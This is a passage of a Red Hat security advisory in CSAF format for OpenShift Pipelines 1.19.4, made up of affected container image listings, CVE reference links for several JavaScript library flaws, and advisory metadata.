| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2025:22905 | self |
| https://access.redhat.com/security/cve/CVE-2025-64756 | external |
| https://access.redhat.com/security/cve/CVE-2025-6545 | external |
| https://access.redhat.com/security/cve/CVE-2025-6547 | external |
| https://access.redhat.com/security/cve/CVE-2025-9287 | external |
| https://access.redhat.com/security/cve/CVE-2025-9288 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2025-6545 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2374370 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-6545 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-6545 | external |
| https://github.com/browserify/pbkdf2/commit/96990… | external |
| https://github.com/browserify/pbkdf2/commit/e3102… | external |
| https://github.com/browserify/pbkdf2/security/adv… | external |
| https://access.redhat.com/security/cve/CVE-2025-6547 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2374378 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-6547 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-6547 | external |
| https://github.com/browserify/pbkdf2/security/adv… | external |
| https://access.redhat.com/security/cve/CVE-2025-9287 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2389932 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9287 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-9287 | external |
| https://github.com/browserify/cipher-base/pull/23 | external |
| https://github.com/browserify/cipher-base/securit… | external |
| https://access.redhat.com/security/cve/CVE-2025-9288 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2389980 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9288 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-9288 | external |
| https://github.com/browserify/sha.js/pull/78 | external |
| https://github.com/browserify/sha.js/security/adv… | external |
| https://access.redhat.com/security/cve/CVE-2025-64756 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2415451 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-64756 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-64756 | external |
| https://github.com/isaacs/node-glob/commit/47473c… | external |
| https://github.com/isaacs/node-glob/security/advi… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.19.4 GA release of Red Hat OpenShift Pipelines Operator..\nFor more details see [product documentation](https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines).",
"title": "Topic"
},
{
"category": "general",
"text": "The 1.19.4 release of Red Hat OpenShift Pipelines Operator.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:22905",
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-64756",
"url": "https://access.redhat.com/security/cve/CVE-2025-64756"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6545",
"url": "https://access.redhat.com/security/cve/CVE-2025-6545"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6547",
"url": "https://access.redhat.com/security/cve/CVE-2025-6547"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9287",
"url": "https://access.redhat.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9288",
"url": "https://access.redhat.com/security/cve/CVE-2025-9288"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_22905.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Pipelines Release 1.19.4",
"tracking": {
"current_release_date": "2026-06-06T13:19:46+00:00",
"generator": {
"date": "2026-06-06T13:19:46+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.2"
}
},
"id": "RHSA-2025:22905",
"initial_release_date": "2025-12-09T10:09:13+00:00",
"revision_history": [
{
"date": "2025-12-09T10:09:13+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-09T10:09:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-06T13:19:46+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Pipelines 1.19",
"product": {
"name": "Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_pipelines:1.19::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Pipelines"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3A2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3A73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3Ae5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3A4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3Adfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3Af869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3Aef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3A563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3A5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3Aacbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3A3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
